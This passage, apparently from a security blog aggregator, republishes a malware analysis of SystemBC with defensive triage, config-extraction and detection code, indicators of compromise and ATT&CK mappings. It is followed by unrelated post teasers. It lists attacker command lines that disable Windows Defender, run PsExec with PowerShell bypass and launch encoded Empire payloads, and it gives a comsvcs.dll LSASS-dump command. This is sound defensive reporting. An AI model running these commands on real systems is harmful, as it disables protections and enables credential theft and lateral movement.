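    ts = struct.unpack_from("<I", data, e_lfanew + 8)[0]
    return datetime.fromtimestamp(ts, tz=timezone.utc)


def rsds_records(data: bytes):
    """Yield (guid, age, pdb_path) for every CodeView RSDS record in the buffer.

    Scanning raw bytes instead of walking the debug directory is deliberate:
    it also works on memory dumps and on samples with damaged headers.
    """
    for m in re.finditer(rb"RSDS", data):
        off = m.end()
        if off + 20 > len(data):
            continue
        guid = uuid.UUID(bytes_le=data[off:off + 16])
        age = struct.unpack_from("<I", data, off + 16)[0]
        end = data.find(b"\0", off + 20)
        if end == -1:
            continue
        yield guid, age, data[off + 20:end]


def triage(data: bytes):
    """Return one row like the report's table (pdb, build id, timestamp) or None."""
    for _guid, _age, path in rsds_records(data):
        m = PDB_PATTERN.fullmatch(path)
        if m:
            ts = coff_timestamp(data)
            return {
                "pdb": path.decode("ascii", "replace"),
                "build_id": m.group(1).decode("ascii"),
                "compiled": ts.strftime("%Y-%m-%d %H:%M") if ts else None,
            }
    return None


def build_fake_pe(timestamp: int, pdb_path: bytes) -> bytes:
    """Construct a minimal PE-shaped blob with the given timestamp and RSDS record."""
    e_lfanew = 0x80
    header = bytearray(e_lfanew)
    header[:2] = b"MZ"
    struct.pack_into("<I", header, 0x3C, e_lfanew)
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x14C, 3, timestamp, 0, 0, 0xE0, 0x102)
    cv = b"RSDS" + uuid.uuid4().bytes_le + struct.pack("<I", 1) + pdb_path + b"\0"
    return bytes(header) + coff + b"\0" * 0x100 + cv + b"\0" * 0x40


# Constructed sample: the e93 path and the table's 2021-02-23 21:32 UTC timestamp.
SAMPLE = build_fake_pe(1614115920, rb"y:\test4\e93\Debug\e93.pdb")

if __name__ == "__main__":
    print(triage(SAMPLE))
```

Running triage() over a directory of samples and sorting on the "compiled" field reproduces the kind of table shown above; a PDB path that matches but whose timestamp is far outside the 2019 to 2021 range would be worth a second look, since timestamps are trivially forged.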

SystemBC Payload

As reported by Sophos, SystemBC is an “off-the-shelf” piece of malware that bundles a TOR client to phone home over the TOR network. An even earlier version, documented by Proofpoint in 2019, implemented a SOCKS5 proxy. The SystemBC payload analyzed by F-Secure shares a number of key capabilities with those previously reported samples.

On first execution it creates a scheduled task for persistence via a COM interface (CLSID: 148BD52A-A2AB-11CE-B11F-00AA00530503). The task, named “wow64”, runs the wrapper image with the “start” argument, starting at the current time and repeating every two minutes. The CLSID is stored in the .data section at offset 0x50C3.

The malware executes files received from the C2 after writing the files out to %TEMP%. It supports execution of EXE, VBS, BAT, CMD and PS1 file types.

Figure 18: C2 Identification Routine

PS1 files are executed with PowerShell using the parameters “-WindowStyle Hidden -ep bypass -file” followed by the payload path, which is identical to the other public samples analyzed by security researchers. Other file types are executed via a scheduled task, using the same COM interface the malware uses for its own persistence.

Figure 19: Execution Flow

SystemBC: A new variant?

The sample analyzed by F-Secure also differs significantly from those previously analyzed. The unpacked SystemBC payload is smaller than the 2020 versions: just 28 KB, compared with 44 KB for the TOR version. The new version lacks previously observed features such as the TOR client, the anti-virus process check and relocation of the binary on disk. The following sections explore those differences in more detail.

Initialization

When the SystemBC payload analyzed by F-Secure executes, it first searches for, and creates, a mutex named “wow64”. It then calls sub_402985 to check whether the command line argument passed to it equals “start”. If the mutex did not already exist and the file was executed with “start”, execution continues into sub_401549, which handles the C2 commands.

Figure 20: Initialization Function (New Version)

In the older version of SystemBC, the process name is used as the mutex name. Initialization is otherwise fairly similar to the new sample, with a few differences. The old sample attempts to find the a2guard.exe process, which belongs to Emsisoft’s anti-virus product; if the process is found, the sample exits without establishing persistence. If the “start” argument is missing, the file is copied into a randomly named directory under ProgramData.

Figure 21: Initialization Function (Old Version)

In both samples, if the “start” argument is missing, a scheduled task will be created from the disk image with “start” argument.

C2 Callback

Before SystemBC calls the C2 server, it will collect some basic information from the host.

Username
The Windows build number for the infected system
A WOW process check (32-bit or 64-bit detection)
The volume serial number

Figure 22: RtlGetVersion and IsWow64Process APIs Runtime Resolution (New Version)

The older version, which has TOR capabilities, implements a small TOR client that, according to Sophos, is likely a C port of the open source mini-tor project (written in C++). C2 communications are then routed over TOR.

Figure 23: C2 Code (Old Version)

The newer sample lacks the TOR client code completely; its C2 communications are implemented with plain sockets over TCP/IPv4 on non-standard ports. An XOR routine is called to decrypt the required port number from the .data section of the binary.

Figure 24: Call WSAStartup and Decrypt Port Number (New Version)

The malware then continues with the C2 connection, decrypting the IP-address with the same XOR function as well as building the required parameters to make a network connection.

Figure 25: C2 IP Decryption & Socket Creation (New Version)

XOR

Interestingly, in both the old and new samples the XOR decryption function at offset 0x2C07 is called multiple times for different strings loaded from process memory. The function compares the address of the string passed to it against the start of the decryption key and the end of the encrypted data section, and only decrypts the string if it lies inside those bounds.

Figure 26: Decryptor Function

This could suggest that there is support for further obfuscation in SystemBC by encrypting more of the plaintext strings. The XOR decryption key used is 40 bytes long and located at the beginning of a .data section at 0x5000. The C2 details are located immediately after the key.

This kind of XOR function and the configuration have been observed in even older samples from 2019. The new sample analyzed is very similar to previously observed samples in terms of capability, but as discussed above has a different implementation for initialization and C2. The earliest sample of this SystemBC version was observed at the beginning of January 2021.
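One way to turn the layout described above into a configuration extractor, as an added Python example (not the malware’s decryptor and not F-Secure’s tooling): the 40-byte key sits at the start of .data (0x5000), the C2 details follow it, and decryption is applied only to strings whose address lies inside the encrypted region. Two details are assumptions rather than facts from the report: that the key is applied cyclically, and that the port and IP are stored as NUL-padded ASCII in fixed-width slots. The .data image in the block is constructed; the IP is the SystemBC address from the indicator table below, while the port and key are made up.

```python
"""Recover the C2 host and port from SystemBC's XOR-encrypted .data block.

Added example, not the malware's code or F-Secure's tooling.  Layout per the
report: 40-byte key at the start of .data (0x5000), C2 details right after it,
and a decrypt routine that only transforms strings located between the start
of the key and the end of the encrypted block.  Assumed, not from the report:
cyclic key application and fixed-width ASCII slots for port and IP.
"""
import socket

DATA_SECTION_VA = 0x5000        # .data offset from the report
KEY_LEN = 40                    # key length from the report
PORT_SLOT = (KEY_LEN, 8)        # assumed: (section offset, slot length), ASCII port
IP_SLOT = (KEY_LEN + 8, 16)     # assumed: ASCII dotted quad


def xor_cycle(buf: bytes, key: bytes, key_offset: int = 0) -> bytes:
    """XOR buf with key starting at key[key_offset] and wrapping (assumed scheme)."""
    return bytes(b ^ key[(key_offset + i) % len(key)] for i, b in enumerate(buf))


class SystemBCConfig:
    def __init__(self, section: bytes, base: int = DATA_SECTION_VA):
        self.section, self.base = section, base
        self.key = section[:KEY_LEN]
        self.region = (base, base + len(section))     # [key start, end of .data)

    def decrypt(self, address: int, data: bytes) -> bytes:
        """The bounds check from the report: outside the region, return data as-is."""
        lo, hi = self.region
        if not (lo <= address < hi):
            return data
        key_offset = (address - (lo + KEY_LEN)) % KEY_LEN
        return xor_cycle(data, self.key, key_offset)

    def field(self, offset: int, length: int) -> bytes:
        raw = self.section[offset:offset + length]
        return self.decrypt(self.base + offset, raw).split(b"\0", 1)[0]

    def c2(self):
        """Return (ip, port); raises if the key or the layout assumption is wrong."""
        port = int(self.field(*PORT_SLOT).decode("ascii"))
        ip = self.field(*IP_SLOT).decode("ascii")
        socket.inet_aton(ip)                     # sanity check: must be a dotted quad
        if not 0 < port < 65536:
            raise ValueError(f"implausible port {port}")
        return ip, port


def build_section(key: bytes, ip: str, port: int) -> bytes:
    """Construct a .data image in the assumed layout (the inverse of c2())."""
    body = bytearray(key)
    for (off, length), value in ((PORT_SLOT, str(port)), (IP_SLOT, ip)):
        body += xor_cycle(value.encode("ascii").ljust(length, b"\0"), key, off - KEY_LEN)
    return bytes(body)


SAMPLE_KEY = bytes(range(0x11, 0x11 + KEY_LEN))            # constructed key
# Constructed section: IP from the report's indicator table, port made up.
SAMPLE_SECTION = build_section(SAMPLE_KEY, "79.110.52.9", 4001)

if __name__ == "__main__":
    print(SystemBCConfig(SAMPLE_SECTION).c2())
```

On a real sample, feed c2() the raw bytes of the .data section; a wrong key or a different slot layout surfaces as a ValueError or OSError from the sanity checks rather than as silently wrong output, which is the failure mode a config extractor should have.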

Indicators & Detection

Detection

The table below contains the offensive techniques mentioned within this report mapped to the open source detection framework Sigma. Sigma allows detection logic to be converted into many formats for use across a wide range of industry detection tooling. A fidelity rating is included with each rule to guide how it should be weighted within internal scoring and alerting systems.

n.b. – The fidelity rating may vary depending on the specifics of your environment.

Detection Context              | SIGMA Rule                                        | Fidelity
PowerShell Empire Execution    | Empire PowerShell Launch Parameters               | High
PowerShell Empire Execution    | Suspicious PowerShell Invocations – Generic       | High
PowerShell Empire Execution    | Suspicious PowerShell Parameter Substring         | High
PowerShell Empire C2 Traffic   | Empire UserAgent URI Combo                        | High
Ntdsutil Execution             | Invocation of Active Directory Diagnostic Tool    | High
PsExec Lateral Movement        | PsExec Tool Execution                             | High
PsExec Lateral Movement        | PsExec Service Start                              | High
Malicious Script Execution     | Antivirus Relevant File Paths Alerts              | High
Comsvcs LSASS Dump             | Process Dump via Rundll32 and Comsvcs.dll         | High
Disabling Windows Defender     | Windows Defender Threat Detection Disabled        | High
Nltest Execution               | Domain Trust Discovery                            | Medium
Advanced IP Scanner Execution  | Advanced IP Scanner                               | Medium
NET.exe Domain Enumeration     | Suspicious Reconnaissance Activity                | Medium
NET.exe Local Enumeration      | Local Accounts Discovery                          | Low
Quick Network Enumeration      | Quick Execution of a Series of Suspicious Commands | Low
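The following Python is an added example that runs detection logic for several of the rows above (the Empire launcher, the reg.exe Defender tampering from Figure 6, the PsExec lateral movement from Figure 11, the comsvcs.dll LSASS dump from Figure 12 and the enumeration commands listed at the end of the report) over constructed Sysmon-style process-creation events. It is not F-Secure’s detection content and not the referenced Sigma rules; the selectors, the event format, the host names, PIDs and paths are all assumptions made for the demonstration.

```python
"""Host-level detections for the techniques in this report, evaluated offline
over constructed Sysmon-style process-creation events.

Added example: not F-Secure's detections nor the referenced Sigma rules.  The
selectors follow the command lines in Figures 6, 11 and 12, the Empire
launcher and the enumeration commands; fidelity labels mirror the table.
Events, host names, PIDs and paths are constructed for the demonstration.
"""
import re
from collections import defaultdict

DEFENDER_POLICY = r"HKLM\\Software\\Policies\\Microsoft\\Windows Defender"
DEFENDER_VALUES = (r"Disable(AntiSpyware|AntiVirus|RealtimeMonitoring|BehaviorMonitoring|"
                   r"IOAVProtection|OnAccessProtection|BlockAtFirstSeen)")
ANY = re.compile(r"")

# (rule name, fidelity, image-name regex, command-line regex)
RULES = [
    ("Empire PowerShell Launch Parameters", "High", r"powershell\.exe$",
     re.compile(r"-noP\b.*-sta\b.*-w 1\b.*-enc\b", re.I)),
    ("Process Dump via Rundll32 and Comsvcs.dll", "High", r"rundll32\.exe$",
     re.compile(r"comsvcs\.dll\s*,\s*MiniDump\b", re.I)),
    ("Windows Defender Threat Detection Disabled", "High", r"reg\.exe$",
     re.compile(DEFENDER_POLICY + r".*\b" + DEFENDER_VALUES + r"\b", re.I)),
    ("PsExec Tool Execution", "High", r"psexec(64)?\.exe$",
     re.compile(r"\\\\\S+.*\s-accepteula\b", re.I)),
    ("PsExec Service Start", "High", r"psexesvc\.exe$", ANY),
    ("Domain Trust Discovery", "Medium", r"nltest\.exe$", re.compile(r"/dclist", re.I)),
    ("Suspicious Reconnaissance Activity", "Medium", r"net1?\.exe$",
     re.compile(r'\bgroup\s+"?(domain admins|enterprise admins|domain computers)"?\s+/domain', re.I)),
]
RECON = re.compile(r"\b(net1?(\.exe)?\s+(group|user)\b.*/domain|nltest(\.exe)?\s+/dclist|ping(\.exe)?\s)", re.I)


def match_rules(event):
    """Return [(rule, fidelity)] for a single process-creation event."""
    hits = []
    for name, fidelity, image_re, cmd_re in RULES:
        if re.search(image_re, event["image"], re.I) and cmd_re.search(event["cmd"]):
            hits.append((name, fidelity))
    return hits


def correlate_recon(events, window=60, threshold=3):
    """'Quick Execution of a Series of Suspicious Commands': at least `threshold`
    distinct recon command lines on one host inside `window` seconds.  Low
    fidelity on its own, hence a separate, counted signal rather than a rule."""
    by_host = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        if RECON.search(e["cmd"]):
            by_host[e["host"]].append(e)
    alerts = []
    for host, evs in by_host.items():
        for i, first in enumerate(evs):
            burst = {e["cmd"].lower() for e in evs[i:] if e["ts"] - first["ts"] <= window}
            if len(burst) >= threshold:
                alerts.append((host, first["ts"], len(burst)))
                break
    return alerts


def run(events):
    """Evaluate every rule plus the correlation; returns sorted (host, ts, rule, fidelity)."""
    findings = [(e["host"], e["ts"], n, f) for e in events for n, f in match_rules(e)]
    findings += [(h, ts, "Quick Execution of a Series of Suspicious Commands", "Low")
                 for h, ts, _ in correlate_recon(events)]
    return sorted(findings)


SYS32 = r"C:\Windows\System32"
EVENTS = [  # constructed, loosely following the order of the intrusion
    {"ts": 0, "host": "WS01", "image": SYS32 + r"\WindowsPowerShell\v1.0\powershell.exe",
     "cmd": "powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJA"},
    {"ts": 30, "host": "WS01", "image": SYS32 + r"\net1.exe", "cmd": 'net1 group "domain admins" /domain'},
    {"ts": 35, "host": "WS01", "image": SYS32 + r"\nltest.exe", "cmd": "nltest.exe /dclist:example.local"},
    {"ts": 40, "host": "WS01", "image": SYS32 + r"\net1.exe", "cmd": 'net1 group "domain computers" /domain'},
    {"ts": 900, "host": "WS01", "image": SYS32 + r"\reg.exe",
     "cmd": r'reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f'},
    {"ts": 1200, "host": "WS01", "image": r"C:\Users\Public\PsExec.exe",
     "cmd": r'PsExec.exe -d \\SRV02 -u "EXAMPLE\admin" -p "<pass>" -accepteula -s cmd /c "powershell.exe -ExecutionPolicy Bypass -file \\WS01\s$\1.ps1"'},
    {"ts": 1201, "host": "SRV02", "image": r"C:\Windows\PSEXESVC.exe", "cmd": r"C:\Windows\PSEXESVC.exe"},
    {"ts": 1262, "host": "SRV02", "image": SYS32 + r"\rundll32.exe",
     "cmd": r"rundll32.exe C:\Windows\System32\comsvcs.dll, MiniDump 652 C:\Windows\Temp\SRV02 full"},
    {"ts": 1300, "host": "WS01", "image": SYS32 + r"\reg.exe",   # benign, must not fire
     "cmd": r'reg.exe query "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductName'},
]

if __name__ == "__main__":
    for finding in run(EVENTS):
        print(finding)
```

Two caveats when moving this onto real telemetry: the powershell.exe parent in Figure 12 carries the same comsvcs.dll string on its own command line, so the rundll32 image filter should be relaxed or a second rule added for the parent; and the values written in Figure 6 live under the Policies hive, so the same paths are worth alerting on from registry-set telemetry as well, where they also fire if the change arrives through Group Policy tooling rather than reg.exe.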

MITRE ATT&CK

Tactic              | Technique                                                  | Technique ID
Initial Access      | External Remote Services                                   | T1133
Initial Access      | Valid Accounts: Domain Accounts                            | T1078.002
Initial Access      | Trusted Relationship                                       | T1199
Execution           | Command & Scripting Interpreter: PowerShell                | T1059.001
Execution           | Command & Scripting Interpreter: Windows Command Shell     | T1059.003
Execution           | Inter-Process Communication: Component Object Model        | T1559.001
Execution           | Native API                                                 | T1106
Persistence         | Scheduled Task/Job: Scheduled Task                         | T1053.005
Defense Evasion     | Obfuscated Files or Information: Software Packing          | T1027.002
Defense Evasion     | Process Injection: Portable Executable Injection           | T1055.002
Defense Evasion     | Process Injection: Process Hollowing                       | T1055.012
Defense Evasion     | Deobfuscate/Decode Files or Information                    | T1140
Defense Evasion     | Impair Defenses: Disable or Modify Tools                   | T1562.001
Credential Access   | Exploitation for Credential Access                         | T1212
Credential Access   | OS Credential Dumping: LSASS Memory                        | T1003.001
Credential Access   | OS Credential Dumping: NTDS                                | T1003.003
Discovery           | Account Discovery: Domain Account                          | T1087.002
Discovery           | Domain Trust Discovery                                     | T1482
Discovery           | Network Service Scanning                                   | T1046
Discovery           | Network Share Discovery                                    | T1135
Discovery           | Permission Groups Discovery: Domain Groups                 | T1069.002
Discovery           | Remote System Discovery                                    | T1018
Discovery           | System Information Discovery                               | T1082
Lateral Movement    | Lateral Tool Transfer                                      | T1570
Lateral Movement    | Remote Services: Remote Desktop Protocol                   | T1021.001
Lateral Movement    | Remote Services: SMB/Windows Admin Shares                  | T1021.002
Command and Control | Application Layer Protocol: Web Protocols                  | T1071.001
Command and Control | Non-Standard Port                                          | T1571

Files

File Name     | Context                  | SHA256
a.ps1         | Enumeration Script       | B953F255F799D43131FAAB437C22B883B0903704328D58F9AE8111066D7AA1E4
1.ps1         | LSASS Dumper             | 03960062388E8068143FB6CAE203DA2954C3A43BE3306D0D326F015A14019EFF
servers0.bat  | PsExec Execution Script  | 890F5323E870C49C412EECD0417D8E1F22D7FFDB8AED11FAE0810383D7C42B91
svchost.exe   | SystemBC Malware         | 2dc93817039e6fa4fae014e1386cffa7ac35b89feac59d8abe7f51be1c089580

IP Addresses

IP Address        | Context           | Last Observed
193.29.104[.]187  | PowerShell Empire | 2021-02-27
79.110.52[.]9     | SystemBC          | 2021-02-27
23.227.202[.]22   | SystemBC          | 2021-02-27

URLs

URL | Last Observed
hXXps://fs12n1.sendspace[.]com/dl/2dcbf9eb9e28920a81febd3f0a8cda84/6039c40226878d2e/px2kd3/1.rar | 2021-02-27
hXXps://fs12n5.sendspace[.]com/dl/5593c4325c0f9c23cb59661893ae9454/6039c46105fab7d4/3dugcw/2.zip | 2021-02-27

Malicious Command Lines

Enumeration:
ping.exe <hostname>
net.exe group "domain computers" /domain
net.exe group "domain admins" /domain
net.exe group "enterprise admins" /domain
net.exe user <USER> /domain
net1.exe group "domain computers" /domain
net1.exe group "domain admins" /domain
net1.exe group "enterprise admins" /domain
net1.exe user <USER> /domain
nltest.exe /dclist:
nltest.exe /dclist:<DOMAIN>

Execution:
advanced_ip_scanner.exe /portable "C:/Users/<USER>/Downloads/" /lng en_us
powershell.exe
powershell.exe -noP -sta -w 1 -enc SQBmACgAJABQAFMAVgBFAFIAcwBJA<REDACTED>
iexplore.exe http://www.advanced-ip-scanner.com/link.php?lng=en&ver=2-5-3850&beta=n&page=help
cmd.exe /C "C:\s$\Servers0.bat"
psexec.exe -d \\<hostname> -u "<username>" -p "<pass>" -accepteula -s cmd /c "powershell.exe -ExecutionPolicy Bypass -file \\<share>\1.ps1"
C:\Users\Public\Music\svchost.exe start

Defensive Evasion:
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v DisableAntiVirus /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v MpEnablePus /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableBehaviorMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableIOAVProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableOnAccessProtection /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRealtimeMonitoring /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableRoutinelyTakingAction /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v DisableScanOnRealtimeEnable /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v DisableEnhancedNotifications /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v DisableBlockAtFirstSeen /t REG_DWORD /d 1 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SpynetReporting /t REG_DWORD /d 0 /f
reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v SubmitSamplesConsent /t REG_DWORD /d 2 /f
reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

The post Prelude to Ransomware: SystemBC appeared first on Malware Devil.



https://malwaredevil.com/2021/05/10/prelude-to-ransomware-systembc/?utm_source=rss&utm_medium=rss&utm_campaign=prelude-to-ransomware-systembc

NAME:WRECK DNS Bugs: What You Need to Know

For most internet users, there’s not much of a perceivable difference between the domain name they want to visit and the server that the domain queries. That’s because the Domain Name System (DNS) protocol does a good job of seamlessly routing users to different IP addresses that are all associated with a single domain name. […]

The post NAME:WRECK DNS Bugs: What You Need to Know appeared first on The State of Security.

The post NAME:WRECK DNS Bugs: What You Need to Know appeared first on Security Boulevard.


The post NAME:WRECK DNS Bugs: What You Need to Know appeared first on Malware Devil.



https://malwaredevil.com/2021/05/10/namewreck-dns-bugs-what-you-need-to-know/?utm_source=rss&utm_medium=rss&utm_campaign=namewreck-dns-bugs-what-you-need-to-know

Cybersecurity and Compliance for Healthcare Organizations

Amidst the pandemic overwhelming the capacity of many hospital systems, malicious hackers have been quick to target healthcare providers and medical agencies. These cyber-attacks have hit both the United States and Europe in recent months, serving as a reminder for organizations to closely review their information security posture during these times of uncertainty. Despite certain […]

The post Cybersecurity and Compliance for Healthcare Organizations appeared first on The State of Security.

The post Cybersecurity and Compliance for Healthcare Organizations appeared first on Security Boulevard.


The post Cybersecurity and Compliance for Healthcare Organizations appeared first on Malware Devil.



https://malwaredevil.com/2021/05/10/cybersecurity-and-compliance-for-healthcare-organizations/?utm_source=rss&utm_medium=rss&utm_campaign=cybersecurity-and-compliance-for-healthcare-organizations

Barbary Pirates and Russian Cybercrime

In 1801, the United States had a small Navy. Thomas Jefferson deployed almost half that Navy—three frigates and a schooner—to the Barbary C...